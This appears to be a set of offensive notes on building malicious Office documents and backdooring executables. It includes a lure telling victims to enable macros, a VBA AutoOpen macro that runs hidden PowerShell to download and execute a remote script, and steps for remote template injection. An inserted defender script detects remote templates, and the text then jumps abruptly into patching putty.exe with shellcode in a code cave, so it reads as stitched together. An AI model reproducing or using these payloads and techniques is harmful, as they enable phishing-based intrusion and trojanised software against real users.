To prepare the document for delivery, go to File > Info > Inspect Document > Inspect Document, which brings up the Document Inspector. Click Inspect and then Remove All next to Document Properties and Personal Information. This prevents the username on your system from being embedded in the document.
Entice the user to enable macros. Message example: "Security Product XYZ has scanned the content and deemed it to be safe. To reveal the content, click Enable Content"
Simple macro
Save it as .doc. A macro in a .docx is not possible, and a .docm has a huge "!" and might get blocked by email gateways.
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://<IP>/shell.ps1'))"""
End Sub
Template injection
Remote Template Injection is a technique where an attacker sends a benign document to a victim, which downloads and loads a malicious template. This template may hold a macro, leading to code execution.
Manual way
Create a Word document with the preferred macro. Save it as a .dot Word 97-2003 Template (*.dot) file.
Host the template on a webserver, for example http://<IP>/template.dot
Create a new document with the template and save it as .docx.
Browse to the directory in Windows Explorer, right-click the document and select 7-Zip > Open archive. Navigate to word > _rels, right-click settings.xml.rels and select Edit.
Change the Target entry from the one pointing to the local file to the template hosted on the webserver: Target="http://<IP>/template.dot"
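A defender-side check for the relationship edit described above, added here as an example that is not part of the original page: it reads word/_rels/settings.xml.rels from a .docx and reports any attachedTemplate relationship whose target is an HTTP(S) URL or UNC path rather than a local file. The sample .docx, the build_sample_docx helper and the 203.0.113.5 address are constructed for this example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def find_remote_templates(docx_bytes):
    """Return attachedTemplate targets that point off-host (HTTP(S) or UNC).

    A document attached to a local template has a file:// target, so only
    network targets are reported; no settings.xml.rels means no template.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if SETTINGS_RELS not in z.namelist():
            return hits
        root = ET.fromstring(z.read(SETTINGS_RELS))
        for rel in root.iter("{%s}Relationship" % RELS_NS):
            if rel.get("Type") != ATTACHED_TEMPLATE:
                continue
            target = rel.get("Target", "")
            scheme = urlparse(target).scheme.lower()
            if scheme in ("http", "https") or target.startswith("\\\\"):
                hits.append(target)
    return hits


def build_sample_docx(template_target):
    """Constructed test input: a minimal zip with only the parts this check reads."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="External"/>'
        '</Relationships>'
    ) % (RELS_NS, ATTACHED_TEMPLATE, template_target)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()


if __name__ == "__main__":
    # 203.0.113.5 is a documentation-range address used as a placeholder.
    print(find_remote_templates(build_sample_docx("http://203.0.113.5/template.dot")))
    print(find_remote_templates(build_sample_docx("file:///C:\\Users\\user\\Templates\\Normal.dotm")))
```

Run it over real mail attachments by passing the file bytes to find_remote_templates; a non-empty result is the signal to quarantine and inspect.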
Select the first instruction and press space (or right-click and select Assemble).
Change the instruction to jmp 0x followed by the cave address. Example: jmp 0x0045C961
Placing shellcode in the nullbyte area will change the stack, pointers etc. Save all register values and the flags to the stack by setting the following instructions in the first nullbytes:
pushad
pushfd
Select the rest of the nullbyte area and copy the following calc32 hex shellcode; right-click the nullbyte area and go to Binary --> Edit. Paste it with the cursor at the first 00.
Save the changes with Ctrl+P, click "Select All" and "Patch File". Save it as a different file and run it. Calc.exe will execute!
But putty.exe won't run: the process stops, even though calc.exe spawns. Set a breakpoint at every call by pressing F2 on every line with a call.
Run through the code until calc.exe spawns and add a comment to the last call which spawned calc.exe. Then continue until it exits and change the last call that exited.
Select an address in the nullbyte area, for example 0045CA27. Change the push before the last call by pressing space to jmp 0x0045CA27
Restore the state of the registers and flags. Set the following instructions at address 0045CA27 and below:
popfd
popad
Restore the first two instructions of step 5. Copy the bytes below, select the next empty nullbyte area, click "Binary" -> "Edit" and paste them.
6A 60 68 B0 7A 47 00
Make a jump to the next instruction from step 5. Copy the address (00454AD7) and change the next nullbyte to jmp 0x00454AD7